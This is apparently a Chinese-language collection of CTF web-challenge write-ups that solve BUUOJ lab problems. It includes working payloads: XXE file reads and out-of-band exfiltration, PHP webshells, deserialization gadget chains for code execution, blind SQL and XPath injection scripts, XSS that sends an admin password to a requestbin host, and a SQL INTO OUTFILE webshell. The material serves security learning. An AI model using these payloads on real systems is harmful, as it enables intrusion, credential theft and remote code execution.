<!DOCTYPE message[
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///0xc4m3l/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

讲 flag 外带出来利用报错

[SUCTF 2018]GetShell

2021.1.15

考点

文件上传无符号木马

做题步骤

可以看到一个 upload

会判断我们的输入是不是从第五个字符开始字符是在黑名单里面的。

对于这种。我们需要对能使用的字符串进行fuzz

于是生成 fuzz 字典

import string
fo = open("fuzz.txt",'wb')
for i in string.printable:
    payload = '12345'+i
    fo.write(payload+'\n')

fo.close()

可以使用的是 $()[]-~

且能使用中文字符。

因为这里不能存在 % 所以刚开始想到的直接 urlencode(~(phpinfo)) 就不能被使用。

然后我们发现可以利用中文字符。

我们要上传文件，所以这里我们要构造一个合适的一句话木马文件。

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

因为可以利用中文，所以这里用上述的，方法二

payload

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

查看flag

不是flag

flag 在环境变量里面

[HFCTF2020]BabyUpload

2021.1.15

考点

做题步骤

打开后看到，源代码

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}
if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

代码审计

刚开始设置了对应 session 保存的位置 /var/babyctf

1 2	session_save_path("/var/babyctf/"); session_start();

然后根据session 中的 session['username'] 字段来判断进行的操作。

if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}

如果 session['username']==='admin' 然后会判断是否存在 /var/babyctf/success.txt 如果存在就会输出flag。

如果不为 admin 那么就 session['username']='guest'

然后接受我们的 post 值。并根据输入的值进行不同调用

$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}

然后更具 $direction 来进行不同操作。

if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

upload 中

上传文件在 /var/babyctf/(session['username'])

文件名为，文件自己名字+ ‘_’ +sha256(文件名)

然后限制了目录穿透，创建对应目录

上传文件。
download 中

根据 post 传入的 filename 且防止目录穿透。

根据 filename 找到对应文件。存在就能返回对应的内容。

这里我们需要的是

session['username']==='admin'
存在文件 /var/babyctf/success.txt

因为我们可以下载和上传文件。且@mkdir($dir_path, 0700, TRUE); 会创建文件

且我们可以修改我们的 PHPSESSION 。

我们也可以上传我们的 SESSION 文件。

利用 download 查看一下我们的 session 文件保存的内容是什么

因为我们知道他的拼接规则，所以我们可以自己伪造一个 session 文件。

<?php
ini_set('session.serialize_handler', 'php_binary');
session_save_path("/Users/0xc3m4l/Desktop/File/Web/Buu/[HFCTF2020]BabyUpload/");
session_start();

$_SESSION['username'] = 'admin';

于是我们要自己上传一个文件，因为没有文件上传的点，这里我们可以自己写一个 form 表单来实现上传。

<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>
        <form action="http://bd5ea38d-c46c-486d-920b-082482b17796.node3.buuoj.cn/" method="post" enctype="multipart/form-data">
        <input type="file" name="up_file" />
        <input type="hidden" name="attr" value=".">
        <input type="hidden" name="direction" value="upload">
        <input type="submit" name="submit" value="提交">
        </form>
    </body>
</html>

利用这个方法来上传对应的 session 文件。

双穿的内容里面是有一个 %08 的

因为会创建目录。

所以我们在传一次

然后修改我们的 PHPSESSION 为对应值

432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4

[2020 新春红包题]1

2021.1.15

考点

反序列化。

利用 php 伪协议绕过一句话的拼接。

做题步骤

打开网页什么都没有

根据提示传入参数 src

得到源代码

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        // 使缓存文件名随机
        $cache_filename = $this->options['prefix'] . uniqid() . $name;
        if(substr($cache_filename, -strlen('.php')) === '.php') {
          die('?');
        }
        return $cache_filename;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return $filename;
        }
        return null;
    }
}
if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

根据源代码分析，应该是一个反序列化题目

根据题目，我们先找到魔法函数等。

发现在 class A 中有对应的

__destruct() -> $this->save() -> $this->store->set (store 为 class B时) 这样能够调用到 -> class B.set() -> file_put_contents($filename,$data);

如果要得到flag。所以这里我们的利用链应该是这样的

代码分析

在 class A 中，的 array_flip() 函数根据内容生成对应键值的数组

然后调用 array_intersect_key() 从而限定了我们的键值，只有

'path', 'dirname', 'basename', 'extension', 'filename','size', 'mimetype', 'visibility', 'timestamp', 'type'

然后返回对应的数组。

返回后的数组利用 json_ecode() 函数处理。

然后作为 class B 的set 方法的第二个参数传入。

根据 set传入的第一个参数，要求后缀不是 .php

然后根据我们的输入返回目录。如果不存在就会创建。

然后根据我们的 class B 的 options['serialize'] 来调用函数。

说明这里的 options['serialize'] 是我们可以控制成其他的函数。如果被我们赋值为 system 这样能实现调用吗？

接着后面会调用另一个利用点。

这里会讲我们的 $data 利用 sprintf 来构造新的$data

然后调用 file_put_contents() 这个函数不但可以写，还可以调用来写文件，也可以调用 php 伪协议

这里我们利用赋值 $this->options['serialize']='system' 来直接调用。

刚开始直接 ls 返现没有回显，于是只能写入到 ./uploads/ 中的文件中

<?php
class A{
    protected $store;
    protected $key;
    protected $expire;
    public $cache = [];
    public $complete = true;
    public function __construct () {
        $this->store = new B();
        $this->key = '/../jly.phtml';
        $this->cache = ['path'=>'a','dirname'=>'`ls / > ./uploads/1.php`'];
    }
}
class B{
    public $options = [
        'serialize' => 'system',
        'prefix' => '0xc4m3l',
    ];
}
echo urlencode(serialize(new A()));

从而我们就可以查看 flag了

然后查看 /flag

<?php
class A{
    protected $store;
    protected $key;
    protected $expire;
    public $cache = [];
    public $complete = true;
    public function __construct () {
        $this->store = new B();
        $this->key = '/../jly.phtml';
        $this->cache = ['path'=>'a','dirname'=>'`cat /flag > ./uploads/1.php`'];
    }
}
class B{
    public $options = [
        'serialize' => 'system',
        'prefix' => '0xc4m3l',
    ];
}
echo urlencode(serialize(new A()));

看了 wp 还有一种利用方法，利用 file_put_contents() 利用伪协议来写一句话

这里因为会在我们的最后 $data 后面加上 exit(); 所以正常写入是不行的，这里我们可以利用 php伪协议的 php://filter/write=convert.base64-decode/resource= 这样来写

这样我们的写入进行base64 阶码，如果我们原本传入的数据是 base64 加密的解密后就是正确的一句话木马，$data 中拼接的 exit() 就会被改变成乱码从而不会被调用。

绕过 php 后缀只需需要用 /. 来绕过。

这样我们的一句话就被写入了，从而我们就能利用了。

[网鼎杯 2020 青龙组]filejava

2021.1.16

考点

java 文件目录结构。

Xxe 漏洞。

xxe 无回显数据外带

做题步骤

查看源码。发现 action 为 ./UploadServlet 应该这是一个 java 题目，

然后我们随便上传一个东西。

上传成功后是一个文件下载。抓包看看

发现是根据 filename 来获得对应我们上传的文件的。

我们看看有没有目录穿透。

从而确定这是一个 java 题目，这里我们首先看看能不能读到我们需要的

Web.xml 文件

../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

发现是可以读取的。

且里面有 3个 Servlet

所以我们是能得到对应的路径

也能下载，这样我们就能进行代码审计了。

classes/cn/abc/servlet/

从而下载这三个 class

使用 IDEA 进行分析。

首先看看目录穿透的下载的地方

这里限制了文件名字不能有 flag 所以我们不能直接下载 flag 文件。

然后就是正常的找到文件，根据 _ 切割文件名，然后发送给客户端。

然后去看 UploadServlet 在里面返现一个判断我们上传文件是否为 excel- 开头的 xlsx 文件判断

利用的 poi-ppxml-3.10 百度下

https://xz.aliyun.com/t/6996

找到对应的 cve 讲解。

要引用本地的 dtd

所以我们在外面的服务器里面构造一个 dtd文件。

引用我服务器上的 dtd 文件。

然后利用 xxe 的文件数据外带。

https://xz.aliyun.com/t/3357

https://blog.csdn.net/per_se_veran_ce/article/details/105035963

构造我们的 1.dtd

然后我们上传对应的 xlsx 文件。

监听端口得到flag

[CSAWQual 2019]Web_Unagi

2021.1.16

考点

Xxe

做题步骤

打开网页看看有没有什么必要信息。

这里的有用消息是，我们可以知道这里是让我们上传一个 xml 文件，这样我们就知道这个应该是一个 xxe 文件读取。

然后flag 的位置是在 /flag 下。

创建一个 xml 文件，

<?xml version='1.0'?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///flag'>]>
<users>
    <user>
        <username>0xc4m3l</username>
        <password>jlyjly</password>
        <name> jlyjly</name>
        <email>jly@test.com</email>
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

[XNUCA2019Qualifier]EasyPHP

2021.1.16

考点

做题步骤

打开网站得到源码

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance");
?>

遍历目录删除不是 index.php 的文件。

然后包含了 fl3g.php 文件

然后读入 content 和 filename 且 content 里面不能有 on,html,type,flag,upload,file 等字符。

Filename 只能是 a-z和单引号

然后再次删除除了 index.php 以外的文件

不是很明白这道题

思路为写入 .htaccess 文件。利用这个方法，来将我们的一句话写入 index.php 中

从而我们能能够命令执行。

https://my.oschina.net/u/4350311/blog/3311515

https://guokeya.github.io/post/xnuca2019qualifiereasyphphtaccess-li-yong/

利用 content 末尾 + # \ 来绕过末尾加 "\nJust one chance"

[Black Watch 入群题]Web

2021.1.17

考点

sql 注入

做题步骤

直接盲注得到 username 和 password

import requests
import time
flag=''

payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'    

payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' 

payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'                                                                                                                                       # contents表里有id,title,content,is_enable

payload4 = '1^(ascii(substr((select(group_concat(password))from(admin)),{},1))>{})^1'



for i in range(1,100):
    low =28
    high =137
    mid = (low + high) // 2

    while(low < high):
        url = 'http://0a360430-150d-49f2-9736-2e8aaad68c84.node3.buuoj.cn/backend/content_detail.php?id='
        payload = payload4.format(i,mid)
        url+=payload
        # print(url)
        r = requests.get(url)
        text = str(r.json())
        time.sleep(0.1)
        if "札师傅缺个女朋友" in text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2

    if(chr(mid)==''):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

[EIS 2019]EzPOP

2021.1.17

考点

PHP反序列

做题步骤

直接给了源码

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
  
{
    mkdir($dir);
}
unserialize($_GET["data"]);

类似于 [2020 新春红包题]1

比那道题简单，这里可以写 php 文件。所以我们可以直接用。

利用 php://filter/write=convert.base64-decode/resource 来写，

这样就能让最后的 \n exit() 被转义

<?php
class A{
    protected $store;
    protected $key;
    protected $expire;
    
    public function __construct(){
        $this->store = new B;
        $this->expire = 0;
        $this->key = "";
        $this->autosave = false;
        $this->cache = [];
        $this->complete = 'aaa'.base64_encode('<?=@eval($_REQUEST["c0r1"]);?>');
    }
}

class B{
    public function __construct(){
        $this->writeTimes = 0;
        $this->options['prefix'] = "php://filter/write=convert.base64-decode/resource=uploads/shell.php";
        $this->options['data_compress'] = false;
        $this->options['serialize'] = "system";   # 可以修改为 system 直接调用 和 [2020 新春红包题1] 一样
    }
}

echo urlencode(serialize(new A));

[CISCN2019 总决赛 Day1 Web4]Laravel1 （记得要写复现内容）

2021.1.17

考点

反序列化

做题步骤

可以先下载对应的备份文件。

网页代码是一个反序列化地方。

可能这个就是我们要利用的点

<?php
//backup in source.tar.gz

namespace App\Http\Controllers;


class IndexController extends Controller
{
    public function index(\Illuminate\Http\Request $request){
        $payload=$request->input("payload");
        if(empty($payload)){
            highlight_file(__FILE__);
        }else{
            @unserialize($payload);
        }
    }
}

这里直接收缩对应框架漏洞可以找到一个反序列化利用点

https://www.anquanke.com/post/id/189718

https://laworigin.github.io/2019/02/21/laravelv5-7%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96rce/

直接打。

<?php

namespace Symfony\Component\Cache\Adapter;

class TagAwareAdapter{
    public $deferred = array();
    function __construct($x){
        $this->pool = $x;
    }
}

class ProxyAdapter{
    protected $setInnerItem = 'system';
}

namespace Symfony\Component\Cache;

class CacheItem{
    protected $innerItem = 'cat /flag';
}

$a = new \Symfony\Component\Cache\Adapter\TagAwareAdapter(new \Symfony\Component\Cache\Adapter\ProxyAdapter());
$a->deferred = array('aa'=>new \Symfony\Component\Cache\CacheItem);
echo urlencode(serialize($a));

[GWCTF 2019]mypassword

2021.1.18

考点

做题步骤

测试功能

注册登录，都可以。

admin 账号已经存在，不知道密码所以猜测可能知道密码就能得到 flag。

随便创建一个用户名密码都为 123的账号。

进入后提示要看源码。且没有sql注入。

在 feedback.php 中看到了一些注释。

if(is_array($feedback)){
				echo "<script>alert('反馈不合法');</script>";
				return false;
			}
			$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
			foreach ($blacklist as $val) {
		        while(true){
		            if(stripos($feedback,$val) !== false){
		                $feedback = str_ireplace($val,"",$feedback);
		            }else{
		                break;
		            }
		        }
		    }

讲里面的内容进行替换，替换为空可以实现绕过。可以利用类似双写绕过。

这里有一个提示，是提意见，猜测这里是有管理员后台点击，可能存在 xss

写入内容

<scrcookieipt>alert(123)</scrcookieipt>

然后在 list 里面查看内容，实现 xss。

但是要怎么才能得到 admin 账户的密码呢？

我们只能从登录的时候入手。

登录的时候调用了一个js

查看里面的内容

将我们的 psw 的 user 信息都存入了表单。

来就收 xss 传入内容。

http://http.requestbin.buuoj.cn/

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/rgutsxrg/?a="+psw;
</scrcookieipt>

得到 flag

[NPUCTF2020]ezlogin

2021.1.19

考点

Xpath 注入

伪协议文件包含

大小写绕过

做题步骤

发现登陆会出现超时，查看源码看到一个 /static/main.js

var current = null;
document.querySelector('#username').addEventListener('focus', function(e) {
  if (current) current.pause();
  current = anime({
    targets: 'path',
    strokeDashoffset: {
      value: 0,
      duration: 700,
      easing: 'easeOutQuart'
    },
    strokeDasharray: {
      value: '240 1386',
      duration: 700,
      easing: 'easeOutQuart'
    }
  });
});
document.querySelector('#password').addEventListener('focus', function(e) {
  if (current) current.pause();
  current = anime({
    targets: 'path',
    strokeDashoffset: {
      value: -336,
      duration: 700,
      easing: 'easeOutQuart'
    },
    strokeDasharray: {
      value: '240 1386',
      duration: 700,
      easing: 'easeOutQuart'
    }
  });
});
document.querySelector('#submit').addEventListener('focus', function(e) {
  if (current) current.pause();
  current = anime({
    targets: 'path',
    strokeDashoffset: {
      value: -730,
      duration: 700,
      easing: 'easeOutQuart'
    },
    strokeDasharray: {
      value: '530 1386',
      duration: 700,
      easing: 'easeOutQuart'
    }
  });
});

function doLogin(){
  var username = $("#username").val();
  var password = $("#password").val();
  var token = $("#token").val();
  if(username == "" || password == ""){
    $(".msg").text("用户名和密码不能为空!");
    return;
  }
  
  var data = "<username>"+username+"</username>"+"<password>"+password+"</password>"+"<token>"+token+"</token>"; 
    $.ajax({
        type: "POST",
        url: "login.php",
        contentType: "application/xml",
        data: data,
        anysc: false,
        success: function (result, status, xhr) {
          if(result == '成功'){
            window.location.href = 'admin.php';  
          }
          $(".msg").text(result);
          
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

成功会跳转到admin.php

登录的 session 一段时间就换，所以抓包做很麻烦。

抓登录包发现这里上传的内容是 xml 格式。

刚开始想了一个利用 sql注入试试，但是发现应该不是 sql 注入。

是 xpath 注入。

https://www.cnblogs.com/backlion/p/8554749.html

利用语句测试

']|//*|//*['

所以应该是能够注入的，但是没有回显，这里只能利用到 xpath 盲注。

然后判断一下是不是布尔

测试语句 'or count(/)=1 or ''='

判断应该是布尔型的

然后写脚本进行盲注

根据抓包信息来写

POST /login.php HTTP/1.1
Host: c3e84939-033b-49ce-be1b-4f368d67e248.node3.buuoj.cn
Content-Length: 91
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/xml
Origin: http://c3e84939-033b-49ce-be1b-4f368d67e248.node3.buuoj.cn
Referer: http://c3e84939-033b-49ce-be1b-4f368d67e248.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: UM_distinctid=1766fe38d35a2b-0d115f068fffa3-163a6153-384000-1766fe38d36a4b; PHPSESSID=11c5e6c7c256a6ae4a7e6c5f39a1c7e7
Connection: close

<username>1</username><password>1</password><token>b1708700d7f28388bc663579a92ab70T</token>

exp

import re
import requests
import time
s = requests.session()
url ='http://c3e84939-033b-49ce-be1b-4f368d67e248.node3.buuoj.cn/login.php'



head ={
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')

strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'


flag =''
for i in range(1,100):
    for j in strs:

        r = s.post(url=url)
        token = find.findall(r.text)
        print(token)
        #猜测根节点名称
        payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #猜测子节点名称
        payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测accounts的节点
        payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测user节点
        payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #跑用户名和密码
        payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        # adm1n

        payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        # cf7414b5bdb2e65ee43083f4ddbc4d9f

        # print(payload_username)
        r = s.post(url=url,headers=head,data=payload_username)
        # print(r.text)
        time.sleep(0.1)


        if "非法操作" in r.text:
            flag+=j
            print(flag)
            break

    if "用户名或密码错误!" in r.text:
        break

print(flag)

成功登陆页面

查看源码。发现有个 base64 加密

然后看 Url 猜测可能存在文件包含。

用伪协议读一下需要大小写绕过。

?file=Php://filter/reAd=convert.Base64-encode/resource=/flag

[安洵杯 2019]iamthinking

2021.1.19

考点

php 反序列化。

做题步骤

打开网页就一个图片

扫下目录

发现有个 www.zip

发现是 tp 的框架。版本为 ThinkPHP 6.0

https://www.anquanke.com/post/id/187393#h3-3

找到关键地方

因为有个 parse_url

所以我们要绕过利用 \\\public\

有个 poc 生成工具

https://github.com/wh1t3p1g/phpggc

分析

https://g.yuque.com/u390550/hsy6gq/cur5rv?language=en-us

[SUCTF 2018]annonymous

2021.1.20

考点

匿名函数格式 %00lambda_数字

做题步骤

打开有源码

<?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

这里是创建了一个匿名函数，匿名函数也是有格式的。

\x00lambda_x x 为随机数。

这里可以利用 burp 爆破

[V&N2020 公开赛]TimeTravel

2021.1.20

考点

做题步骤

得到源码

<?php
error_reporting(0);
require __DIR__ . '/vendor/autoload.php';

use GuzzleHttp\Client;

highlight_file(__FILE__);

if(isset($_GET['flag'])) {
    $client = new Client();
    $response = $client->get('http://127.0.0.1:5000/api/eligible');
    $content = $response->getBody();
    $data = json_decode($content, TRUE);
    if($data['success'] === true) {
      echo system('/readflag');
    }
}

if(isset($_GET['file'])) {
    highlight_file($_GET['file']);
}

if(isset($_GET['phpinfo'])) {
    phpinfo();
}

当我们传入 flag 会去请求 127.0.0.1:5000/api/eligible 如果返回的 $data['success'] === ‘true’

就能得到 flag

这里我们要做到就是在外面本地创建一个这样的功能。然后调用 get 的时候能接收到返回。

方法1 利用 flask 够着路由返回赵师傅的方法

https://www.zhaoj.in/read-6407.html

from flask import Flask
import json

app = Flask(__name__)

@app.route('/api/eligible')
def source():
    return json.dumps({"success": True})


if __name__ == "__main__":
    app.run(host='127.0.0.1')

方法2 构造对应的返回包。

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 06 Mar 2020 18:27:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: Keep-alive
Content-Length: 16

{"success":true}

用另一个号在 buu 开一个内网服务。

Linux labs

先开始 frp

启动

然后用 ssh 链接

ssh root@网站 -p 端口

查看我们的对应的内网 ip

然后写下这个返回包

让利用 nc

nc -lvvp 2333 < 1.txt

然后给一个代理。代理ip 为内网 ip 端口为我们传的数据的端口。

[SUCTF 2018]MultiSQL

2021.1.21

考点

Sql 注入

做题步骤

登录后用户信息是通过id 判断的

测试看看有没注入点

利用 1^1^1

利用 1^1

说明是存在 sql 注入的

测试头像上传没有漏洞图片会被修改名字。但是我们知道了有个 /favicon 目录

说明这里的漏洞点就在用户信息这里。

一个对应的 sql 注入。

发现很多都被过滤了。

测试下发现也能用堆叠

直接写 shell 可以连接

但是这里我们要用 char 将字符转成 ascii

select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';

